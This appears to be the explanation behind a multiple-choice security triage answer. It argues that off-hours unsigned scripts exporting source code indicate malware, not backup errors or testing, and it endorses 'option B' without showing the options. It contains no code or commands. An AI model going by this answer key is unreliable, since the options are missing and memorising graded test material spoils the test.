Misclassifying this activity as benign poses significant security and operational risks. Persistent malware or unauthorized actors can leverage unsigned scripts to export sensitive source code, which may include proprietary algorithms, trade secrets, or other intellectual property critical to the organization’s competitive advantage. Theft of such data not only jeopardizes business operations but can also lead to regulatory and compliance violations, particularly if the source code contains data covered under privacy regulations or contractual obligations. Persistent malware operating through these scripts may further establish backdoors, modify system configurations, or create additional accounts, allowing attackers to maintain access and move laterally across systems. Off-hours activity is particularly concerning, as it exploits periods of reduced monitoring and oversight, increasing the likelihood that malicious actions go undetected.

Proper response requires careful investigation, verification, and monitoring. Security teams must examine logs of script execution, file access, and network activity to determine the origin and intent of off-hours operations. Endpoint and repository forensics can identify whether scripts are authorized administrative tools or unauthorized malicious activity. Behavioral analysis and anomaly detection can help distinguish between routine operational processes and potentially malicious behavior. Additionally, correlating activity with known testing schedules and approved backup jobs is essential to identify deviations from expected behavior. Any undocumented off-hours script interacting with sensitive source code should be treated as suspicious until fully verified.

While misconfigured backup policies or legitimate user testing may explain minor anomalies, neither scenario accounts for off-hours execution of unsigned scripts exporting sensitive source code. Such activity is inconsistent with benign operational errors or approved testing procedures and strongly indicates malicious intent. Misclassification risks persistent malware presence, intellectual property theft, regulatory violations, and broader system compromise. Accurate verification, monitoring, and timely remediation are critical to identify unauthorized scripts, protect sensitive data, and ensure operational integrity. By maintaining strict oversight of backup processes, monitoring off-hours activity, and enforcing documentation and approval requirements for all scripts and testing procedures, organizations can safeguard intellectual property, reduce the risk of compromise, and mitigate the potential impact of malicious activity.

Selecting option B ensures immediate containment, forensic analysis, and remediation while maintaining endpoint security, intellectual property protection, and regulatory compliance. It also prevents potential further attacks leveraging stolen source code or API credentials.